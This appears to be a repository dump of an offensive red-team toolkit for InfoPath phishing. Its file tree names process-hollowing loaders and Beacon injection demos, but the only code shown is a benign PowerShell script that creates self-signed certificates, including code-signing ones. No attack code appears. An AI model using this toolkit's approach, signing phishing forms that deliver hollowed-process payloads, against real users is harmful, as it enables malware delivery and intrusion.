├── CalcPlease
│   └── CalcPlease.xsn
├── CsPlease
│   ├── CsPlease.xsn
│   ├── CsProcessHollowPlease.xsn
│   └── CsProcessHollowPleasePublished.xsn
├── Extras
│   ├── file.PNG
│   ├── hollow.PNG
│   └── infopathfuture.jpg
├── HelloWorld
│   └── HelloWorld.xsn
├── LICENSE
├── New-SelfSignedCertificateEx.ps1
├── ProcessHollowing
│   ├── LICENSE
│   ├── ProcHollow.sln
│   ├── ShellLoader
│   │   ├── Loader.cs
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── ShellLoader.csproj
│   └── TestApp
│       ├── App.config
│       ├── Program.cs
│       ├── Properties
│       │   └── AssemblyInfo.cs
│       └── TestApp.csproj
├── README.md
├── Setup
│   ├── dotNetFx35setup.exe
│   ├── mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe
│   └── vsta_setup.exe
├── The-Path-To-Info-We-Missed.pdf
└── VideoExamples
    ├── CalcPlease-Example-Fail-mainc.7z
    ├── CalcPlease-Example-Win-mainc.7z
    ├── CsPlease-Beacon-Injection-mainc.7z
    ├── CsPlease-Beacon-ProcessHollow-mainc.7z
    └── HelloWorld-Example-mainc.7z

--------------------------------------------------------------------------------
/CalcPlease/CalcPlease.xsn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CalcPlease/CalcPlease.xsn

--------------------------------------------------------------------------------
/CsPlease/CsPlease.xsn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsPlease.xsn

--------------------------------------------------------------------------------
/CsPlease/CsProcessHollowPlease.xsn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsProcessHollowPlease.xsn

--------------------------------------------------------------------------------
/CsPlease/CsProcessHollowPleasePublished.xsn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsProcessHollowPleasePublished.xsn

--------------------------------------------------------------------------------
/Extras/file.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/file.PNG

--------------------------------------------------------------------------------
/Extras/hollow.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/hollow.PNG

--------------------------------------------------------------------------------
/Extras/infopathfuture.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/infopathfuture.jpg

--------------------------------------------------------------------------------
/HelloWorld/HelloWorld.xsn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/HelloWorld/HelloWorld.xsn

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2017, InfoPhish
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/New-SelfSignedCertificateEx.ps1:
--------------------------------------------------------------------------------
#####################################################################
# New-SelfSignedCertificateEx.ps1
# Version 1.2
#
# Creates self-signed certificate. This tool is a base replacement
# for deprecated makecert.exe
#
# Vadims Podans (c) 2013 - 2016
# http://en-us.sysadmins.lv/
#####################################################################
#requires -Version 2.0

function New-SelfSignedCertificateEx {
<#
.Synopsis
    This cmdlet generates a self-signed certificate.
.Description
    This cmdlet generates a self-signed certificate with the required data.
.Parameter Subject
    Specifies the certificate subject in a X500 distinguished name format.
    Example: CN=Test Cert, OU=Sandbox
.Parameter NotBefore
    Specifies the date and time when the certificate becomes valid. By default the previous day's
    date is used.
.Parameter NotAfter
    Specifies the date and time when the certificate expires. By default, the certificate is
    valid for 1 year (365 days from NotBefore).
.Parameter SerialNumber
    Specifies the desired serial number in a hex format.
    Example: 01a4ff2
.Parameter ProviderName
    Specifies the Cryptography Service Provider (CSP) name. You can use either legacy CSPs
    or Key Storage Providers (KSP). By default "Microsoft Enhanced Cryptographic Provider v1.0"
    CSP is used.
.Parameter AlgorithmName
    Specifies the public key algorithm. By default RSA algorithm is used. RSA is the only
    algorithm supported by legacy CSPs. With key storage providers (KSP) you can use CNG
    algorithms, like ECDH. For CNG algorithms you must use full name:
    ECDH_P256
    ECDH_P384
    ECDH_P521

    In addition, KeyLength parameter must be specified explicitly when non-RSA algorithm is used.
.Parameter KeyLength
    Specifies the key length to generate. By default 2048-bit key is generated.
.Parameter KeySpec
    Specifies the public key operations type. The possible values are: Exchange and Signature.
    Default value is Exchange.
.Parameter EnhancedKeyUsage
    Specifies the intended uses of the public key contained in a certificate. You can
    specify either, EKU friendly name (for example 'Server Authentication') or
    object identifier (OID) value (for example '1.3.6.1.5.5.7.3.1').
.Parameter KeyUsage
    Specifies restrictions on the operations that can be performed by the public key contained in the certificate.
    Possible values (and their respective integer values to make bitwise operations) are:
    EncipherOnly
    CrlSign
    KeyCertSign
    KeyAgreement
    DataEncipherment
    KeyEncipherment
    NonRepudiation
    DigitalSignature
    DecipherOnly

    You can combine key usage values by using a bitwise OR operation. When combining multiple
    flags, they must be enclosed in quotes and separated by a comma character. For example,
    to combine KeyEncipherment and DigitalSignature flags you should type:
    "KeyEncipherment, DigitalSignature".

    The Key Usage extension is always marked as critical.

    If the certificate is CA certificate (see IsCA parameter), key usages extension is generated
    automatically with the following key usages: Certificate Signing, Off-line CRL Signing, CRL Signing.
.Parameter SubjectAlternativeName
    Specifies alternative names for the subject. Unlike Subject field, this extension
    allows to specify more than one name. Also, multiple types of alternative names
    are supported. The cmdlet supports the following SAN types:
    RFC822 Name
    IP address (both, IPv4 and IPv6)
    Guid
    Directory name
    DNS name

    The type is inferred from each string: a value containing '@' is an RFC822 name, then
    IP address, GUID and X.500 directory name are tried in that order, and anything else is
    treated as a DNS name.
.Parameter IsCA
    Specifies whether the certificate is CA (IsCA = $true) or end entity (IsCA = $false)
    certificate. If this parameter is set to $false, PathLength parameter is ignored.
    For CA certificates the Basic Constraints extension is marked as critical.
.Parameter PathLength
    Specifies the number of additional CA certificates in the chain under this certificate. If
    PathLength parameter is set to zero, then no additional (subordinate) CA certificates are
    permitted under this CA.
.Parameter CustomExtension
    Specifies the custom extension to include in a self-signed certificate. This parameter
    must not be used to specify the extension that is supported via other parameters. In order
    to use this parameter, the extension must be formed in a collection of initialized
    System.Security.Cryptography.X509Certificates.X509Extension objects.
.Parameter SignatureAlgorithm
    Specifies signature algorithm used to sign the certificate. By default 'SHA1'
    algorithm is used. SHA1 is kept as the default for backward compatibility only;
    pass 'SHA256' (or stronger) for any certificate that current software has to trust,
    since SHA-1 signatures are rejected for code signing and TLS by modern verifiers.
.Parameter FriendlyName
    Specifies friendly name for the certificate.
.Parameter StoreLocation
    Specifies the store location to store self-signed certificate. Possible values are:
    'CurrentUser' and 'LocalMachine'. 'CurrentUser' store is intended for user certificates
    and computer (as well as CA) certificates must be stored in 'LocalMachine' store.
    The certificate is always installed in the Personal (My) container of the selected
    location; there is no parameter to choose another container.
.Parameter Path
    Specifies the path to a PFX file to export a self-signed certificate.
.Parameter Password
    Specifies the password for PFX file.
.Parameter AllowSMIME
    Enables Secure/Multipurpose Internet Mail Extensions for the certificate.
.Parameter Exportable
    Marks private key as exportable. Smart card providers usually do not allow
    exportable keys. Required when -Path is used, because a non-exportable key
    cannot be written to a PFX.
.Example
    New-SelfSignedCertificateEx -Subject "CN=Test Code Signing" -EKU "Code Signing" -KeySpec "Signature" `
    -KeyUsage "DigitalSignature" -FriendlyName "Test code signing" -NotAfter $([datetime]::now.AddYears(5))

    Creates a self-signed certificate intended for code signing and which is valid for 5 years. Certificate
    is saved in the Personal store of the current user account.
.Example
    New-SelfSignedCertificateEx -Subject "CN=www.domain.com" -EKU "Server Authentication", "Client authentication" `
    -KeyUsage "KeyEncipherment, DigitalSignature" -SAN "sub.domain.com","www.domain.com","192.168.1.1" `
    -AllowSMIME -Path C:\test\ssl.pfx -Password (ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force) -Exportable `
    -StoreLocation "LocalMachine"

    Creates a self-signed SSL certificate with multiple subject names and saves it to a file. Additionally, the
    certificate is saved in the Personal store of the Local Machine store. Private key is marked as exportable,
    so you can export the certificate with an associated private key to a file at any time. The certificate
    includes SMIME capabilities.
.Example
    New-SelfSignedCertificateEx -Subject "CN=www.domain.com" -EKU "Server Authentication", "Client authentication" `
    -KeyUsage "KeyEncipherment, DigitalSignature" -SAN "sub.domain.com","www.domain.com","192.168.1.1" `
    -StoreLocation "LocalMachine" -ProviderName "Microsoft Software Key Storage Provider" -AlgorithmName ECDH_P256 `
    -KeyLength 256 -SignatureAlgorithm sha256

    Creates a self-signed SSL certificate with multiple subject names and saves it in the Personal store of the
    Local Machine store. Certificate uses Elliptic Curve Cryptography (ECC) key algorithm ECDH with 256-bit key.
    The certificate is signed by using SHA256 algorithm.
.Example
    New-SelfSignedCertificateEx -Subject "CN=Test Root CA, OU=Sandbox" -IsCA $true -ProviderName `
    "Microsoft Software Key Storage Provider" -Exportable

    Creates self-signed root CA certificate.
#>
    [OutputType('[System.Security.Cryptography.X509Certificates.X509Certificate2]')]
    [CmdletBinding(DefaultParameterSetName = '__store')]
    param (
        [Parameter(Mandatory = $true, Position = 0)]
        [string]$Subject,
        [Parameter(Position = 1)]
        [datetime]$NotBefore = [DateTime]::Now.AddDays(-1),
        [Parameter(Position = 2)]
        [datetime]$NotAfter = $NotBefore.AddDays(365),
        [string]$SerialNumber,
        [Alias('CSP')]
        [string]$ProviderName = "Microsoft Enhanced Cryptographic Provider v1.0",
        [string]$AlgorithmName = "RSA",
        [int]$KeyLength = 2048,
        [validateSet("Exchange","Signature")]
        [string]$KeySpec = "Exchange",
        [Alias('EKU')]
        [Security.Cryptography.Oid[]]$EnhancedKeyUsage,
        [Alias('KU')]
        [Security.Cryptography.X509Certificates.X509KeyUsageFlags]$KeyUsage,
        [Alias('SAN')]
        [String[]]$SubjectAlternativeName,
        [bool]$IsCA,
        [int]$PathLength = -1,
        [Security.Cryptography.X509Certificates.X509ExtensionCollection]$CustomExtension,
        [ValidateSet('MD5','SHA1','SHA256','SHA384','SHA512')]
        [string]$SignatureAlgorithm = "SHA1",
        [string]$FriendlyName,
        [Parameter(ParameterSetName = '__store')]
        [Security.Cryptography.X509Certificates.StoreLocation]$StoreLocation = "CurrentUser",
        [Parameter(Mandatory = $true, ParameterSetName = '__file')]
        [Alias('OutFile','OutPath','Out')]
        [IO.FileInfo]$Path,
        [Parameter(Mandatory = $true, ParameterSetName = '__file')]
        [Security.SecureString]$Password,
        [switch]$AllowSMIME,
        [switch]$Exportable
    )
    $ErrorActionPreference = "Stop"
    if ([Environment]::OSVersion.Version.Major -lt 6) {
        $NotSupported = New-Object NotSupportedException -ArgumentList "Windows XP and Windows Server 2003 are not supported!"
        throw $NotSupported
    }
    # names of the variables holding the COM extension objects to attach to the request
    $ExtensionsToAdd = @()

    #region constants
    # contexts
    New-Variable -Name UserContext -Value 0x1 -Option Constant
    New-Variable -Name MachineContext -Value 0x2 -Option Constant
    # encoding
    New-Variable -Name Base64Header -Value 0x0 -Option Constant
    New-Variable -Name Base64 -Value 0x1 -Option Constant
    New-Variable -Name Binary -Value 0x3 -Option Constant
    New-Variable -Name Base64RequestHeader -Value 0x4 -Option Constant
    # SANs
    New-Variable -Name OtherName -Value 0x1 -Option Constant
    New-Variable -Name RFC822Name -Value 0x2 -Option Constant
    New-Variable -Name DNSName -Value 0x3 -Option Constant
    New-Variable -Name DirectoryName -Value 0x5 -Option Constant
    New-Variable -Name URL -Value 0x7 -Option Constant
    New-Variable -Name IPAddress -Value 0x8 -Option Constant
    New-Variable -Name RegisteredID -Value 0x9 -Option Constant
    New-Variable -Name Guid -Value 0xa -Option Constant
    New-Variable -Name UPN -Value 0xb -Option Constant
    # installation options
    New-Variable -Name AllowNone -Value 0x0 -Option Constant
    New-Variable -Name AllowNoOutstandingRequest -Value 0x1 -Option Constant
    New-Variable -Name AllowUntrustedCertificate -Value 0x2 -Option Constant
    New-Variable -Name AllowUntrustedRoot -Value 0x4 -Option Constant
    # PFX export options
    New-Variable -Name PFXExportEEOnly -Value 0x0 -Option Constant
    New-Variable -Name PFXExportChainNoRoot -Value 0x1 -Option Constant
    New-Variable -Name PFXExportChainWithRoot -Value 0x2 -Option Constant
    #endregion

    #region Subject processing
    # http://msdn.microsoft.com/en-us/library/aa377051(VS.85).aspx
    $SubjectDN = New-Object -ComObject X509Enrollment.CX500DistinguishedName
    $SubjectDN.Encode($Subject, 0x0)
    #endregion

    #region Extensions

    #region Enhanced Key Usages processing
    if ($EnhancedKeyUsage) {
        $OIDs = New-Object -ComObject X509Enrollment.CObjectIDs
        $EnhancedKeyUsage | ForEach-Object {
            $OID = New-Object -ComObject X509Enrollment.CObjectID
            $OID.InitializeFromValue($_.Value)
            # http://msdn.microsoft.com/en-us/library/aa376785(VS.85).aspx
            $OIDs.Add($OID)
        }
        # http://msdn.microsoft.com/en-us/library/aa378132(VS.85).aspx
        $EKU = New-Object -ComObject X509Enrollment.CX509ExtensionEnhancedKeyUsage
        $EKU.InitializeEncode($OIDs)
        $ExtensionsToAdd += "EKU"
    }
    #endregion

    #region Key Usages processing
    if ($KeyUsage -ne $null) {
        $KU = New-Object -ComObject X509Enrollment.CX509ExtensionKeyUsage
        $KU.InitializeEncode([int]$KeyUsage)
        $KU.Critical = $true
        $ExtensionsToAdd += "KU"
    }
    #endregion

    #region Basic Constraints processing
    if ($PSBoundParameters.Keys.Contains("IsCA")) {
        # http://msdn.microsoft.com/en-us/library/aa378108(v=vs.85).aspx
        $BasicConstraints = New-Object -ComObject X509Enrollment.CX509ExtensionBasicConstraints
        if (!$IsCA) {$PathLength = -1}
        $BasicConstraints.InitializeEncode($IsCA,$PathLength)
        # critical only for CA certificates; end-entity certificates get a non-critical CA:FALSE
        $BasicConstraints.Critical = $IsCA
        $ExtensionsToAdd += "BasicConstraints"
    }
    #endregion

    #region SAN processing
    if ($SubjectAlternativeName) {
        $SAN = New-Object -ComObject X509Enrollment.CX509ExtensionAlternativeNames
        $Names = New-Object -ComObject X509Enrollment.CAlternativeNames
        foreach ($altname in $SubjectAlternativeName) {
            $Name = New-Object -ComObject X509Enrollment.CAlternativeName
            # type inference: '@' -> RFC822, else try IP, then GUID, then X.500 DN,
            # and fall through to DNS name for anything that did not parse
            if ($altname.Contains("@")) {
                $Name.InitializeFromString($RFC822Name,$altname)
            } else {
                try {
                    $Bytes = [Net.IPAddress]::Parse($altname).GetAddressBytes()
                    $Name.InitializeFromRawData($IPAddress,$Base64,[Convert]::ToBase64String($Bytes))
                } catch {
                    try {
                        $Bytes = [Guid]::Parse($altname).ToByteArray()
                        $Name.InitializeFromRawData($Guid,$Base64,[Convert]::ToBase64String($Bytes))
                    } catch {
                        try {
                            $Bytes = ([Security.Cryptography.X509Certificates.X500DistinguishedName]$altname).RawData
                            $Name.InitializeFromRawData($DirectoryName,$Base64,[Convert]::ToBase64String($Bytes))
                        } catch {$Name.InitializeFromString($DNSName,$altname)}
                    }
                }
            }
            $Names.Add($Name)
        }
        $SAN.InitializeEncode($Names)
        $ExtensionsToAdd += "SAN"
    }
    #endregion

    #region Custom Extensions
    if ($CustomExtension) {
        $count = 0
        foreach ($ext in $CustomExtension) {
            # http://msdn.microsoft.com/en-us/library/aa378077(v=vs.85).aspx
            $Extension = New-Object -ComObject X509Enrollment.CX509Extension
            $EOID = New-Object -ComObject X509Enrollment.CObjectId
            $EOID.InitializeFromValue($ext.Oid.Value)
            $EValue = [Convert]::ToBase64String($ext.RawData)
            $Extension.Initialize($EOID,$Base64,$EValue)
            $Extension.Critical = $ext.Critical
            New-Variable -Name ("ext" + $count) -Value $Extension
            $ExtensionsToAdd += ("ext" + $count)
            $count++
        }
    }
    #endregion

    #endregion

    #region Private Key
    # http://msdn.microsoft.com/en-us/library/aa378921(VS.85).aspx
    $PrivateKey = New-Object -ComObject X509Enrollment.CX509PrivateKey
    $PrivateKey.ProviderName = $ProviderName
    $AlgID = New-Object -ComObject X509Enrollment.CObjectId
    $AlgID.InitializeFromValue(([Security.Cryptography.Oid]$AlgorithmName).Value)
    $PrivateKey.Algorithm = $AlgID
    # http://msdn.microsoft.com/en-us/library/aa379409(VS.85).aspx
    $PrivateKey.KeySpec = switch ($KeySpec) {"Exchange" {1}; "Signature" {2}}
    $PrivateKey.Length = $KeyLength
    # key will be stored in current user certificate store unless LocalMachine was requested
    switch ($PSCmdlet.ParameterSetName) {
        '__store' {
            $PrivateKey.MachineContext = if ($StoreLocation -eq "LocalMachine") {$true} else {$false}
        }
        '__file' {
            $PrivateKey.MachineContext = $false
        }
    }
    $PrivateKey.ExportPolicy = if ($Exportable) {1} else {0}
    $PrivateKey.Create()
    #endregion

    # http://msdn.microsoft.com/en-us/library/aa377124(VS.85).aspx
    $Cert = New-Object -ComObject X509Enrollment.CX509CertificateRequestCertificate
    if ($PrivateKey.MachineContext) {
        $Cert.InitializeFromPrivateKey($MachineContext,$PrivateKey,"")
    } else {
        $Cert.InitializeFromPrivateKey($UserContext,$PrivateKey,"")
    }
    $Cert.Subject = $SubjectDN
    # self-signed: issuer equals subject
    $Cert.Issuer = $Cert.Subject
    $Cert.NotBefore = $NotBefore
    $Cert.NotAfter = $NotAfter
    foreach ($item in $ExtensionsToAdd) {$Cert.X509Extensions.Add((Get-Variable -Name $item -ValueOnly))}
    if (![string]::IsNullOrEmpty($SerialNumber)) {
        if ($SerialNumber -match "[^0-9a-fA-F]") {throw "Invalid serial number specified."}
        # pad odd-length hex strings so every byte has two digits
        if ($SerialNumber.Length % 2) {$SerialNumber = "0" + $SerialNumber}
        $Bytes = $SerialNumber -split "(.{2})" | Where-Object {$_} | ForEach-Object{[Convert]::ToByte($_,16)}
        $ByteString = [Convert]::ToBase64String($Bytes)
        $Cert.SerialNumber.InvokeSet($ByteString,1)
    }
    if ($AllowSMIME) {$Cert.SmimeCapabilities = $true}
    $SigOID = New-Object -ComObject X509Enrollment.CObjectId
    $SigOID.InitializeFromValue(([Security.Cryptography.Oid]$SignatureAlgorithm).Value)
    $Cert.SignatureInformation.HashAlgorithm = $SigOID
    # completing certificate request template building
    $Cert.Encode()

    # interface: http://msdn.microsoft.com/en-us/library/aa377809(VS.85).aspx
    $Request = New-Object -ComObject X509Enrollment.CX509enrollment
    $Request.InitializeFromRequest($Cert)
    $Request.CertificateFriendlyName = $FriendlyName
    $endCert = $Request.CreateRequest($Base64)
    # AllowUntrustedCertificate lets the self-signed certificate be installed even though it
    # chains to no trusted root; it lands in the Personal (My) store of the chosen context.
    $Request.InstallResponse($AllowUntrustedCertificate,$endCert,$Base64,"")
    switch ($PSCmdlet.ParameterSetName) {
        '__file' {
            # SecureStringToBSTR/PtrToStringAuto turn the PFX password into a plain .NET string
            # and the BSTR is never zeroed, so the password may linger in process memory.
            # CreatePFX needs an exportable key (-Exportable).
            $PFXString = $Request.CreatePFX(
                [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($Password)),
                $PFXExportEEOnly,
                $Base64
            )
            # -Encoding Byte exists in Windows PowerShell only; PowerShell 7 uses -AsByteStream
            Set-Content -Path $Path -Value ([Convert]::FromBase64String($PFXString)) -Encoding Byte
        }
    }
    [Byte[]]$CertBytes = [Convert]::FromBase64String($endCert)
    New-Object Security.Cryptography.X509Certificates.X509Certificate2 @(,$CertBytes)
}
# Authenticode signature block of the published script (DigiCert-issued code-signing
# certificate of Sysadmins LV IK, timestamped). It covers the exact bytes of the file as
# published, so any change to the script text above invalidates it.
# SIG # Begin signature block
# MIIcgAYJKoZIhvcNAQcCoIIccTCCHG0CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAmMWwZnveROeiP
# Okrv0onByV5n94ickqih9JS7E9E/HKCCF4owggUTMIID+6ADAgECAhABn3Jtjtqs
# sQ4D4Fge9iqaMA0GCSqGSIb3DQEBCwUAMHIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK
# EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xMTAvBgNV
# BAMTKERpZ2lDZXJ0IFNIQTIgQXNzdXJlZCBJRCBDb2RlIFNpZ25pbmcgQ0EwHhcN
# MTUxMjE4MDAwMDAwWhcNMTYxMjIyMTIwMDAwWjBQMQswCQYDVQQGEwJMVjENMAsG
# A1UEBxMEUmlnYTEYMBYGA1UEChMPU3lzYWRtaW5zIExWIElLMRgwFgYDVQQDEw9T
# eXNhZG1pbnMgTFYgSUswggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDo
# UVviPttwGnu8WAEbA2zvYj3+eJLxrpWtcokvyZALEd8hf7m19yCIruChB3b3Cszt
# OMjgV+a4MoPNEjMdnbFVstO+nCxbh/J1W6ArjqEIaYX6H4ZJNwfFD7S22JNeKHW7
# /Z//jdsPSTRvSugWuGFzix0DxdfTDATuq10J6ivi1Tk9DZJpMfEKMnz6ze24UfJU
# FX1XxcbeDgTdK2nd1RGAMKnxYQhn4Gzv+TrbLJWs976aLR/tJ8td4UqtlK/BE0PB
# S3G7Xb4dNjm4e1nVFz7FNf6DqQQ34ZDk+XgVVQINxNbB2WmkOMEJFX2G3+F539d4
# V6EfRAF0+v1U9Ofm1m6TAgMBAAGjggHFMIIBwTAfBgNVHSMEGDAWgBRaxLl7Kgqj
# pepxA8Bg+S32ZXUOWDAdBgNVHQ4EFgQU/3BF2aoFQv5rK3jP1wW8I1t/uoMwDgYD
# VR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMDMHcGA1UdHwRwMG4wNaAz
# oDGGL2h0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEu
# Y3JsMDWgM6Axhi9odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1hc3N1cmVk
# LWNzLWcxLmNybDBMBgNVHSAERTBDMDcGCWCGSAGG/WwDATAqMCgGCCsGAQUFBwIB
# FhxodHRwczovL3d3dy5kaWdpY2VydC5jb20vQ1BTMAgGBmeBDAEEATCBhAYIKwYB
# BQUHAQEEeDB2MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20w
# TgYIKwYBBQUHMAKGQmh0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy
# dFNIQTJBc3N1cmVkSURDb2RlU2lnbmluZ0NBLmNydDAMBgNVHRMBAf8EAjAAMA0G
# CSqGSIb3DQEBCwUAA4IBAQBRqP0FyPMXdmGf4C+ubIeHSeFRcunS6kFdyokn8tKK
# HFqAvea8QCmdFqMPTTet0WK/2O8RiiscWADDbmyHTC9KMNOufeabWtNCbwwaBeg0
# xir8eo2deX1JVWfji4ZdwHTlqJR5hnCM+i1iD60zWOx7+8WAF6toCs5O1+CDqt5P
# hvv0Re0Y17DeFWe9NNanOdy/t+cpTuJZmX3TR5dhRZJTMZZnTdzi4qTWIAaRX4m/
# fUehKfBwd5pzoZwlZ0RC/5RnRMpdUtankwKPdrSjLPSObJwDwxoZvZwpAKhwm1wa
# 49Rv1bHg/r090IrClnAUA6Os1PJAYRWMU8ayMMQuM496MIIFMDCCBBigAwIBAgIQ
# BAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBlMQswCQYDVQQGEwJVUzEV
# MBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29t
# MSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwHhcNMTMxMDIy
# MTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQGEwJVUzEVMBMGA1UEChMM
# RGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQD
# EyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBTaWduaW5nIENBMIIBIjAN
# BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8OEa9ndwfTCzFJGc/Q+0WZ
# sTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq8JyGpdglrA55KDp+6dFn
# 08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRpwsJS8hRniolF1C2ho+mI
# LCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/pfMuSoeU7MRzP6vIK5Fe7
# SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3jNEgJSPrCGQ+UpbB8g8S
# 9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczyen6Yzqf0Z3yWT0QIDAQAB
# o4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNVHQ8BAf8EBAMCAYYwEwYD
# VR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBrMCQGCCsGAQUFBzABhhho
# dHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUHMAKGN2h0dHA6Ly9jYWNl
# cnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcnQwgYEG
# A1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy
# dEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0
# LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwTwYDVR0gBEgwRjA4Bgpg
# hkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNv
# bS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsqCqOl6nEDwGD5LfZldQ5Y
# MB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgPMA0GCSqGSIb3DQEBCwUA
# A4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHXfgtg/cM9D8Svi/3vKt8g
# VTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddfRHnzNhQGivecRk5c/5Cx
# GwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8AlEeKcFEehemhor5unXCBc
# 2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+L3J+HNdJRZboWR3p+nRk
# a7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8B4H6i9r5gkn3Ym6hU/oS
# lBiFLpKR6mhsRDKyZqHnGKSaZFHvMIIGajCCBVKgAwIBAgIQAwGaAjr/WLFr1tXq
# 5hfwZjANBgkqhkiG9w0BAQUFADBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGln
# aUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhE
# aWdpQ2VydCBBc3N1cmVkIElEIENBLTEwHhcNMTQxMDIyMDAwMDAwWhcNMjQxMDIy
# MDAwMDAwWjBHMQswCQYDVQQGEwJVUzERMA8GA1UEChMIRGlnaUNlcnQxJTAjBgNV
# BAMTHERpZ2lDZXJ0IFRpbWVzdGFtcCBSZXNwb25kZXIwggEiMA0GCSqGSIb3DQEB
# AQUAA4IBDwAwggEKAoIBAQCjZF38fLPggjXg4PbGKuZJdTvMbuBTqZ8fZFnmfGt/
